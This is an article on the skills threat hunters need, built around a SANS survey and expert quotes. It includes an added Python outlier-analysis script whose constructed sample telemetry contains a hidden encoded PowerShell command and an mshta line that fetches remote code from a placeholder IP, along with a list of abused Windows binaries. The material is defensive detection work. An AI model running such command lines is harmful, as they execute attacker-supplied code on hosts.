Essential skills for today’s threat analysts

Skilled threat hunters can play a dual role for organizations, hunting for threat actors as well as ensuring budget is directed at tools and technology that will bolster hunting capabilities, according to the SANS 2023 Threat Hunting survey. However, a lack of skilled staff is hampering threat hunting efforts, the global survey of 564 respondents drawn from SOC analysts, security managers and administrators found.

Adding to the task, threat hunters themselves are seeking more training, education, and support from management, the survey has found. As CISOs look ahead to 2024 and the cybersecurity challenges it will bring, what do they need from threat hunting teams and how should threat hunters themselves look to strengthen their skill set?

Technical skills for today’s threat analysts and how they’re evolving

Threat analysts require a blend of traditional and modern technical skills and all the experts speaking to CSO say that Python is indispensable for conducting efficient data analysis. Other important languages and tools to know include C, C++, JavaScript, Ruby on Rails, SQL, PowerShell, Burp Suite, Nessus, and Kali Linux. Foundational knowledge in networking and systems, data analysis skills, knowledge of cloud architectures, and reverse engineering are also regarded as useful.

Threat hunters need a general disposition towards researching complex problems with limited details, solving puzzles and evaluating risks. The task has, however, become more challenging for several reasons, according to Jake Williams, independent security consultant, IANS faculty member, and former senior SANS instructor. “As our perimeter defenses, like endpoint detection and response, have improved and threat actors have gotten better, hunting has become harder. It’s more advanced and requires more skills, and typically, it’s looking for anomalies in data,” he tells CSO.

Familiarity with threat intelligence platforms like MISP and security information and event management (SIEM) tools like Splunk, LogRhythm, and ManageEngine is needed to identify and check exposure to threats, according to Sajeeb Lohani, director of cybersecurity at bug bounty platform Bugcrowd. “And working knowledge of the MITRE ATT&CK framework can help identify different tactics and techniques used during certain attacks. It can help the analyst point out different patterns of attack that others may miss,” Lohani tells CSO. Newer lightweight tools like Wazuh are also becoming more prevalent for identifying and managing threats, including the cryptomining activity that the rise of cryptocurrencies has added to the list of concerns.

Don’t overlook the value of soft skills in threat hunting

In addition to technical prowess, soft skills are equally important. For instance, the ability to succinctly explain threats to various parties is crucial, while attention to detail, analytical thinking, stress management, creativity, and teamwork are all seen as pivotal skills for the modern threat hunter.

Very often, for instance, there’s an urgent need to communicate a new vulnerability to different audiences, which demands tailored communications for technical teams, CISOs, and board members. Williams highlights task management and patience, especially when dealing with uncertain or misleading information, and above all, coordinating between different sources of information. “So much of threat hunting today relates to that living off the land kind of thing where you’re seeing things that look malicious. And so oftentimes you’re developing hypotheses and that involves consulting system admin and working toward a resolution,” says Williams. It’s also important to be flexible in your thinking and not close off your mind to one thing or another, he notes. “Those folks who can hold opposing viewpoints in their mind simultaneously are by far the best.”

How is the role of threat hunter changing?

The responsibilities of the threat hunter have shifted from traditional network monitoring to proactive threat hunting and intelligence gathering, which has meant significant upskilling and new priorities. “Unlike in the past, there’s less manual research and input on blacklists and less reliance on intrusion detection systems,” digital trust expert and ISACA non-executive director Niel Harper tells CSO. Tools able to analyze large amounts of data have come into the frame. “These threat detection tools are providing meaningful, actionable intelligence and prioritization of threats for threat hunters,” says Harper.

However, these tools have also generated a lot of false positives, which has meant threat analysts need to be trained to sift through the false flags to find genuine indicators of compromise. Now with ML and AI and more automation, the role continues to evolve. Harper sees great value in research and analysis skills for threat hunters. “It helps in turning information from various tools into actionable intelligence,” Harper says.

The remit has also expanded to include cloud security monitoring and understanding log centralization and analysis, notes Chris Scott, security operations specialist with the Chaucer Group. “Attackers are targeting those spaces more frequently,” Scott tells CSO. Having worked with some large organizations, he’s seen the shift first-hand. “Someone will spin something up in the cloud and that opens up another attack surface, so you need to have someone proactively looking for the vulnerabilities.”

It’s also a mind game, with threat hunters needing to be highly adaptable as threats change daily, sometimes hourly. “You need to change with them. Never allow an inflexible mind to pervade your operational approach,” says Brian Hussey, VP of threat hunting, intelligence and DFIR at SentinelOne. At the same time, you also need to see the forest for the trees. “Often threat actors introduce surface changes to their attack patterns, but the core modus operandi remains unchanged, leaving important opportunities to identify and eliminate new attacks, even before they arrive,” Hussey tells CSO.

ML and AI have a place, but are not everything

With the SANS survey indicating almost three-quarters of organizations need more training and skilled staff, AI and ML technologies may have a role to play. The experts all agree on the growing importance of ML and AI in enhancing threat hunting detection capabilities. “It can analyze large amounts of information in a short time and we’re seeing a lot more in intelligence from these tools as they can provide you with the best course of action to penetrate a target. This can optimize your exploitation effectiveness,” Harper says.

Outlier analysis, for instance, was once done manually but is now being baked into the tools, so having some understanding of data science and ML toolkits, many of which are exposed through Python, can significantly enhance threat detection capabilities, according to Williams. “You can utilize those immediately to help you find either the things that are very common, or the things that are very uncommon.”
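As an added example (not code from the article or from any of the experts quoted in it), the following Python script does the kind of outlier analysis Williams describes, applied to the living-off-the-land hypothesis he raises earlier: it stacks process-creation events by parent/child pair, counts the number of hosts on which each pair appears, and reports the rare pairs at one end of the distribution and the most common ones at the other. The event fields, hostnames, threshold, list of living-off-the-land binaries and the sample events themselves are all assumptions constructed for the example; the two suspicious events are planted, not taken from real telemetry.

```python
from collections import Counter

# Well-known living-off-the-land binaries (LOLBins): signed Windows tools
# commonly abused to run attacker code. The set here is an assumption for
# the example; real hunts would use a maintained list.
LOLBINS = {"powershell.exe", "mshta.exe", "certutil.exe", "rundll32.exe",
           "regsvr32.exe", "wscript.exe", "cscript.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def build_sample_events():
    """Constructed process-creation telemetry (not real logs). Field names are
    assumptions; a real SIEM export would carry many more columns."""
    events = []
    hosts = [f"ws{n:02d}" for n in range(1, 21)]
    for h in hosts:
        # Ordinary office workload, identical on every workstation.
        events.append({"host": h, "parent": "explorer.exe", "image": "outlook.exe",
                       "cmdline": "outlook.exe"})
        events.append({"host": h, "parent": "explorer.exe", "image": "chrome.exe",
                       "cmdline": "chrome.exe --profile-directory=Default"})
        events.append({"host": h, "parent": "services.exe", "image": "svchost.exe",
                       "cmdline": "svchost.exe -k netsvcs"})
        events.append({"host": h, "parent": "outlook.exe", "image": "winword.exe",
                       "cmdline": "winword.exe /n report.docx"})
    # Admins legitimately launch PowerShell from a console on three hosts.
    for h in hosts[:3]:
        events.append({"host": h, "parent": "cmd.exe", "image": "powershell.exe",
                       "cmdline": "powershell.exe Get-Service"})
    # Two constructed suspicious events buried in the baseline.
    events.append({"host": "ws07", "parent": "winword.exe", "image": "powershell.exe",
                   "cmdline": "powershell.exe -nop -w hidden -enc QQBCAEMA"})
    events.append({"host": "ws13", "parent": "explorer.exe", "image": "mshta.exe",
                   "cmdline": "mshta.exe http://198.51.100.7/a.hta"})
    return events


def stack(events, fields):
    """Count, for each distinct combination of `fields`, the number of hosts on
    which it occurred. Counting hosts rather than raw events stops one noisy
    machine from making a rare pair look common."""
    seen = {(e["host"],) + tuple(e[f] for f in fields) for e in events}
    return Counter(key[1:] for key in seen)


def rare_pairs(counter, max_hosts):
    """The long tail: combinations seen on at most `max_hosts` hosts."""
    return sorted(((k, c) for k, c in counter.items() if c <= max_hosts),
                  key=lambda kc: (kc[1], kc[0]))


def common_pairs(counter, n):
    """The other end of the distribution: the n most widespread combinations."""
    return counter.most_common(n)


def hunt(events, max_hosts=2):
    """Hypothesis: a parent/child pair that appears on only a handful of hosts
    is worth a look, and more so when the child is a LOLBin or the parent is an
    Office application. Returns findings for an analyst to confirm, not verdicts."""
    counter = stack(events, ("parent", "image"))
    findings = []
    for (parent, image), n_hosts in rare_pairs(counter, max_hosts):
        hosts = sorted({e["host"] for e in events
                        if e["parent"] == parent and e["image"] == image})
        reasons = [f"parent/child pair seen on only {n_hosts} host(s)"]
        if image.lower() in LOLBINS:
            reasons.append("child is a living-off-the-land binary")
        if parent.lower() in OFFICE_APPS and image.lower() in LOLBINS:
            reasons.append("Office application spawning a scripting engine")
        findings.append({"parent": parent, "image": image,
                         "hosts": hosts, "reasons": reasons})
    return findings


if __name__ == "__main__":
    evts = build_sample_events()
    for f in hunt(evts):
        print(f"{f['parent']} -> {f['image']} on {f['hosts']}: {'; '.join(f['reasons'])}")
```

Stacking on the raw command line would make almost every event unique, so the script stacks on the parent/child pair and keeps the command line only as context for the analyst. The threshold is where judgement comes in: with `max_hosts=2` the three administrators who run PowerShell from a console stay below the radar, while raising it to 3 surfaces them as the kind of false positive the hunter then has to explain away by talking to the system admins.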

The experts also caution against over-reliance on ML and AI and stress the need for human oversight. AI lowers the skill barrier, but these technologies can’t infer or question the way humans do. These tools should never blunt the power of human curiosity to ask ‘why’, notes Chaucer Group’s Scott. “It’s asking why is something doing that? It’s the ABC rule, assume nothing, believe nothing, confirm everything.”

How should threat hunters keep up with the changing threat landscape?

Continuous learning and adaptability are key to staying up to date as a threat hunter, and hands-on experience counts for most. Spend a couple of years in a security operations center or working in incident response before moving into threat hunting, suggests Williams.

Harper recommends beginners start with the basics of networking and security, using resources available online and communities for guidance. “Connecting with communities of practitioners and professional associations is a way to share tools and information and advance along the learning path,” he says.

The ethical responsibilities threat hunters face

One of the overlooked aspects of the threat hunter’s role is the need for a strong personal ethical framework: not divulging sensitive business information, and not misusing exploits or other information about potential vulnerabilities.

“You will run into several ethical considerations throughout your career,” says SentinelOne’s Hussey. These include hacking back, or taking offensive actions against threat actors, hijacking an attacker’s cryptocurrency, and negotiating with a ransomware threat actor. “It’s essential to communicate your actions with your legal team and with your colleagues. When good people come together to do the right thing, it makes these hard topics much easier to define.” Then there’s the need to handle sensitive information responsibly and transparently and adhere to legal standards. “It’s making sure you protect and store information in a secure way with strong access controls, and if you share this information with third parties [that] they are trusted,” Harper says.

It’s also vital that threat hunters remain neutral in certain investigations, such as corporate espionage or investigations into individuals: start without preconceptions and focus on being unbiased. Chaucer Group’s Scott highlights the ethical implications of threat hunting, emphasizing the responsibility to remain unbiased and protect sensitive information. “It’s following that ABC rule, making no assumptions and focusing on the data, and even ensuring a broader scope of data to avoid coming to a pre-determined conclusion.”

What else to look for when hiring threat hunters

A lack of skilled staff in threat hunting teams is the primary barrier to success, according to the SANS survey. Like other areas of cybersecurity facing a skills gap, diverse hiring may be a solution, but how does this translate to threat hunting?

Harper advocates for an inclusive approach to cybersecurity, saying individuals from diverse educational backgrounds can excel in this field. “I don’t think you need to have a strict computer science or information technology background, as long as there’s an interest and a willingness and passion to learn.”

It also helps to have people who can see beyond the mechanics of a threat and consider the larger aim or motivation of the attackers. “By grasping the ‘why’ behind an attack, analysts can better understand the ‘how’ and ‘when,’ allowing for more effective profiling of adversaries and strengthening of security measures against specific threat vectors,” says Bugcrowd’s Lohani. “This helps inform risk assessment, prioritization of defense efforts, and development of more targeted security education programs for users. Having a grasp on the human element of cybersecurity is essential for a comprehensive defense strategy.”
